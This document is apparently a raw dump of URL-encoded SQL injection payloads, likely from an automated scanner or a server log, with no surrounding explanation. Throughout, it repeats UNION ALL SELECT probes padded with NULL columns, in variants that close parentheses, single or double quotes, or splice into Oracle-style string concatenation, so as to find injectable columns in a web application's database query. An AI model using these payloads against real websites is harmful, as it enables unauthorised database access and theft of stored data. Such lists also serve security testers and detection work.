1%29%20WHERE%207965%3D7965%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%201378%3D1378%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%201530%3D1530%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%207592%3D7592%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208231%3D8231%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%203396%3D3396%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%205268%3D5268%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%207352%3D7352%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%202699%3D2699%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%201275%3D1275%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%206449%3D6449%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%204028%3D4028%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%204156%3D4156%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%201382%3D1382%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%202571%3D2571%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%208972%3D8972%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%207663%3D7663%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%208782%3D8782%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%202888%3D2888%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%206629%3D6629%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%202642%3D2642%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%202885%3D2885%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%206983%3D6983%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%209001%3D9001%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%201445%3D1445%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%204311%3D4311%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%201784%3D1784%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%208735%3D8735%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%203585%3D3585%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206489%3D6489%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%202315%3D2315%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201421%3D1421%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%208901%3D8901%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%203858%3D3858%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%202740%3D2740%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206935%3D6935%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%204392%3D4392%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201864%3D1864%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20%7C%7C%20%28SELECT%205206%20FROM%20DUAL%20WHERE%202896%3D2896%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203899%20FROM%20DUAL%20WHERE%207735%3D7735%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202980%20FROM%20DUAL%20WHERE%203193%3D3193%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206405%20FROM%20DUAL%20WHERE%204578%3D4578%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204325%20FROM%20DUAL%20WHERE%206377%3D6377%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205320%20FROM%20DUAL%20WHERE%209618%3D9618%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204473%20FROM%20DUAL%20WHERE%204647%3D4647%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203098%20FROM%20DUAL%20WHERE%207862%3D7862%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204917%20FROM%20DUAL%20WHERE%209797%3D9797%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204527%20FROM%20DUAL%20WHERE%203285%3D3285%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206214%20WHERE%209890%3D9890%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205929%20WHERE%204524%3D4524%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201417%20WHERE%203292%3D3292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201181%20WHERE%201722%3D1722%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208457%20WHERE%207573%3D7573%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201263%20WHERE%201856%3D1856%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201860%20WHERE%207261%3D7261%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201745%20WHERE%201991%3D1991%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205319%20WHERE%203952%3D3952%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201606%20WHERE%201618%3D1618%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203327%20FROM%20DUAL%20WHERE%204011%3D4011%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 